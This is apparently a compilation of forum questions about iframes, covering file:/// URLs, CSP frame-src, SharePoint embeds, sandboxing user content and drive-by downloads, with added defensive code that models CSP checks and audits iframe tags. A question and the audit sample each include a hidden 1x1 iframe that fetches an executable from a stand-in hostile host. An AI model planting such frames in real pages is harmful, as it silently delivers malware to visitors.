Are IFRAMEs inherently unable to display file:/// URLs?

Yes, the browser and webserver are on the same machine!

Whenever I try to embed an HTML file from outside of the WWW root in an iframe, that is, using the file:/// URL syntax, it is ignored. No error message is logged or anything. Just nothing is done whatsoever.

If I change the path from file:///C:\blablabla.html to ./blablabla.html, and put the file in the WWW root, it will display the HTML page in the iframe. So it’s not some kind of fundamental issue with displaying iframes or anything. I have tried both with and without URL-encoding the C:\... part.

Are IFRAMEs inherently unable to display file:/// URIs, even though the MozDev page mentions no restrictions whatsoever for the src attribute? https://developer.mozilla.org/en-US/docs/Web/HTML/Element/iframe

Alternative approaches to Iframes for content distribution via json api

I am currently working on a project that uses iframes to distribute content to customers. Going ahead we would like to switch to a JSON-based REST API to deliver the content. API access would need a token to which specific content could be exposed and traffic limits set.

To replace the frontend appearance of the iframe I am thinking about writing a reusable bundle using a lightweight React alternative like preactjs. But this would mean exposing the raw API and the specific token to the end user. Simply routing user requests via the customer's server would conceal the token but still allow raw API access to the end user.

What would be a good architecture for such a use case?

Are there server side rendered solutions that can easily be implemented across a variety of backend frameworks, without rewriting everything for each customer that is?

Thanks for any advice

Correct CSP frame-src value for iframes with empty src value

We have the CSP directives below defined on our site:

script-src 'self' 'unsafe-inline' 'unsafe-eval'  *.youtube.com; style-src  'self' 'unsafe-inline'; frame-src *.facebook.com  www.youtube.com; 

As per this value, we only allow the facebook and youtube domains as src values in our site's iframes. But we have the iframes below rendered in our site.

<iframe id="EPFACLC-1579856043157" src="about:blank" frameborder="0" scrolling="no" title="chat widget"></iframe> 

How are these iframes not restricted by the CSP rule?

Thanks in advance.
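A small model of how a browser evaluates frame-src for the policy quoted above, including the about:blank case, as an added example that is not code from the question. Assumed here: the page lives at https://example.com (constructed), and about: URLs are handled the way Chromium handles them, never subject to frame-src because nothing is fetched for them.

```javascript
// Added example, not code from the question. Models frame-src evaluation for the policy
// quoted in the question. Assumptions: page origin https://example.com (constructed);
// about: URLs are treated as Chromium does, i.e. never checked against frame-src.
const CSP = "script-src 'self' 'unsafe-inline' 'unsafe-eval'  *.youtube.com; " +
            "style-src  'self' 'unsafe-inline'; frame-src *.facebook.com  www.youtube.com;";

// Split a policy string into directive name -> list of source expressions.
// The first occurrence of a directive wins, as in CSP.
function parsePolicy(csp) {
  const directives = new Map();
  for (const part of csp.split(";")) {
    const [name, ...values] = part.trim().split(/\s+/).filter(Boolean);
    if (name && !directives.has(name.toLowerCase())) directives.set(name.toLowerCase(), values);
  }
  return directives;
}

// frame-src falls back to child-src, then default-src. null means "no directive applies".
function effectiveFrameSrc(directives) {
  for (const name of ["frame-src", "child-src", "default-src"]) {
    if (directives.has(name)) return directives.get(name);
  }
  return null;
}

function hostMatches(pattern, host) {
  if (pattern === "*") return true;
  if (pattern.startsWith("*.")) {
    const suffix = pattern.slice(1);                             // "*.facebook.com" -> ".facebook.com"
    return host.endsWith(suffix) && host.length > suffix.length; // the apex domain itself does not match
  }
  return pattern === host;
}

// Does one source expression ('self', a scheme-source, or a host-source) match the URL?
function matchesExpression(expr, url, page) {
  const e = expr.toLowerCase();
  if (e === "'none'") return false;
  if (e === "'self'") return url.origin === page.origin;
  if (e.startsWith("'")) return false;               // nonces and hashes never match a URL
  const urlScheme = url.protocol.slice(0, -1);
  const pageScheme = page.protocol.slice(0, -1);
  // https is accepted where http was written (CSP3), never the other way round.
  const schemeOk = (want) => urlScheme === want || (want === "http" && urlScheme === "https");
  if (/^[a-z][a-z0-9+.-]*:$/.test(e)) return schemeOk(e.slice(0, -1));
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?([^\/:]+)(?::(\d+|\*))?(\/.*)?$/.exec(e);
  if (!m) return false;
  const [, scheme, hostPattern, port, path] = m;
  if (!schemeOk(scheme || pageScheme)) return false;  // no scheme written: the page's scheme applies
  if (!hostMatches(hostPattern, url.hostname)) return false;
  if (port && port !== "*" && url.port !== port) return false;
  if (path && !(url.pathname === path || (path.endsWith("/") && url.pathname.startsWith(path)))) return false;
  return true;
}

function isFrameAllowed(frameSrc, csp, pageUrl) {
  const page = new URL(pageUrl);
  // about:blank (and about:srcdoc) involve no fetch, so there is no request for frame-src
  // to block. The empty frame inherits the embedder's origin and CSP; whatever script writes
  // into it later is governed by that inherited policy's script-src.
  if (frameSrc.startsWith("about:")) {
    return { allowed: true, reason: "about: URL is not subject to frame-src" };
  }
  const sources = effectiveFrameSrc(parsePolicy(csp));
  if (sources === null) return { allowed: true, reason: "no frame-src, child-src or default-src" };
  const url = new URL(frameSrc, page);
  const hit = sources.find((s) => matchesExpression(s, url, page));
  return hit ? { allowed: true, reason: `matched ${hit}` }
             : { allowed: false, reason: "no source expression matched" };
}
```

The chat widget's frame starts life as about:blank and is then filled by script running in the top document, so the control point for what ends up inside it is script-src, not frame-src; with 'unsafe-inline' and 'unsafe-eval' in script-src any injected script on the page can write into such a frame, which is the part of this policy worth tightening (nonces or hashes instead of 'unsafe-inline').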

Drive by download with iframes

Does the definition of a drive-by download include the malicious execution of an unaccepted downloaded file, or is the unaccepted download of a file the drive-by download by itself? I didn't find a good/clear definition.

Why is it possible to download files with a hidden iframe, so that the user isn't even asked if he wants to download it? Something like this:

<iframe src="https://attacker.com/evil.exe" width="1" height="1" frameborder="0"></iframe> 

Isn't this way too risky?

Thank you for your answers.

Adding domain to HTML Field Security does not affect Library > Add Video > Embed iframes

I’m using a video hosting service that provides me with embed codes for the videos: something like this:

<iframe title="Part 1" width="640" height="360" allowTransparency="true" mozallowfullscreen webkitallowfullscreen allowfullscreen style="background-color:transparent;" frameBorder="0" src="https://app.vidgrid.com/embed/--video-id--"></iframe> 

This works totally fine if embedded by a contributor on a SharePoint page (clicking “Add A Page > insert > Embed Code”) because I have added the video’s domain (app.vidgrid.com) to the HTML Field Security allowed list. But. We have a Video Library (“Libraries > Training Video Library > Add > Video”) which also allows video iframes, but the contributor sees this error (works for me, as an admin):

Create new video from vidgrid gives error "the embed code is invalid because the source of the embed content is not allowed"

My guess is, SharePoint isn't using the HTML Field Security allowed domain list for this video embed piece. Is there any hope? 😀 Or does everyone just need to add a full page for each video, or download the video as an MP4 and re-upload it to SharePoint (works but clunky).

iframes, user generated content and scripts

Currently, we have a small personal project which is meant to allow people to create ‘profiles’ in HTML/CSS. We aim to put all this generated content within a sandboxed iframe. The next point in discussion comes from allowing scripts in these iframes since users will be able to enter whatever content they want.

Couple things to note:

  • All these iframes are hosted under the same subdomain
  • The site has a cross-origin policy of allow-all
  • Authorization is handled through tokens stored within a React app. Not cookies.

I am mostly curious about the security risks of such a design and I have not found a clear, concise answer. Should we allow scripts within these iframes, or does this pose too much of a risk? What type of attacks are we looking at through an iframe? I am concerned mostly with XSS-type attacks. What about browser vulnerabilities with iframes?

Thanks! Any feedback would be greatly appreciated.
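An audit of the iframe elements in a page's HTML, added here as an example for both the drive-by-download question (hidden frames pointing at hosts that are not on an allowlist) and the user-generated-profiles question (sandbox attribute configurations); it is not code from either post. The HTML, the host allowlist and the hidden-frame threshold are constructed for the demo. The sandbox checks rest on two browser facts: a frame that has both allow-scripts and allow-same-origin can reach back into a same-origin parent and undo its own sandboxing, and Chromium does not start downloads from a sandboxed frame unless allow-downloads is present.

```javascript
// Added example, not code from either question. Audits <iframe> tags in an HTML string for
// the risks discussed above. The sample HTML, allowlist and thresholds are constructed.

const ALLOWED_FRAME_HOSTS = ["app.vidgrid.com", "profiles.example"]; // constructed allowlist

// Constructed page: a normal video embed, a hidden 1x1 frame to an off-allowlist host,
// and a user profile frame sandboxed with both allow-scripts and allow-same-origin.
const SAMPLE_HTML = `
<iframe title="Part 1" width="640" height="360" allowfullscreen frameBorder="0" src="https://app.vidgrid.com/embed/--video-id--"></iframe>
<iframe src="https://hostile.example/update.exe" width="1" height="1" frameborder="0"></iframe>
<iframe sandbox="allow-scripts allow-same-origin" src="https://profiles.example/u/123"></iframe>
`;

// Parse the attribute list of one tag into { name: value }; bare attributes get "".
function parseAttributes(tagBody) {
  const attrs = {};
  const re = /([^\s=\/"']+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
  let m;
  while ((m = re.exec(tagBody)) !== null) {
    attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4] ?? "";
  }
  return attrs;
}

function findIframes(html) {
  const out = [];
  const re = /<iframe\b([^>]*)>/gi;
  let m;
  while ((m = re.exec(html)) !== null) out.push(parseAttributes(m[1]));
  return out;
}

// A frame the user cannot see: 1x1 or smaller, or hidden by inline style / the hidden attribute.
function isHidden(attrs) {
  const w = parseInt(attrs.width, 10), h = parseInt(attrs.height, 10);
  const style = (attrs.style || "").replace(/\s+/g, "").toLowerCase();
  return (Number.isFinite(w) && w <= 1) || (Number.isFinite(h) && h <= 1) ||
    style.includes("display:none") || style.includes("visibility:hidden") || attrs.hidden !== undefined;
}

function auditIframe(attrs, allowedHosts) {
  const findings = [];
  const src = attrs.src || "about:blank";
  let host = "";
  try { host = new URL(src).hostname; } catch (e) { /* relative URL: same host as the page */ }
  const offList = host !== "" && !allowedHosts.includes(host);
  const sandbox = attrs.sandbox === undefined ? null : attrs.sandbox.toLowerCase().split(/\s+/).filter(Boolean);

  if (offList) findings.push(`src host ${host} is not on the allowlist`);
  if (offList && isHidden(attrs)) findings.push("hidden frame to an off-allowlist host (drive-by download pattern)");
  if (sandbox === null) {
    findings.push("no sandbox attribute: frame content runs with its own origin's full privileges");
  } else {
    if (sandbox.includes("allow-scripts") && sandbox.includes("allow-same-origin"))
      findings.push("allow-scripts with allow-same-origin: a same-origin frame can reach the parent and remove its own sandbox");
    if (sandbox.includes("allow-downloads")) findings.push("allow-downloads lets the frame start downloads");
    if (sandbox.includes("allow-top-navigation")) findings.push("allow-top-navigation lets the frame navigate the whole page");
  }
  return { src, findings };
}

function auditHtml(html, allowedHosts = ALLOWED_FRAME_HOSTS) {
  return findIframes(html).map((a) => auditIframe(a, allowedHosts));
}

// Markup this audit accepts for untrusted profile content: scripts may run, but with no
// same-origin access, no downloads and no top-level navigation. Serving the profiles from
// a separate origin keeps the app's own origin out of reach even if a token leaks into the frame.
function profileFrameHtml(src) {
  return `<iframe sandbox="allow-scripts" src="${src}" title="user profile"></iframe>`;
}
```

Running auditHtml(SAMPLE_HTML) flags the vidgrid embed only for its missing sandbox, the 1x1 frame for both its off-allowlist host and the hidden-frame pattern, and the profile frame for combining allow-scripts with allow-same-origin; the markup from profileFrameHtml produces no findings. For the profiles design in the question, the practical consequence is that scripts can be allowed only if the frames are not same-origin with the React app that holds the tokens, which means a separate origin for the profile content rather than the same subdomain.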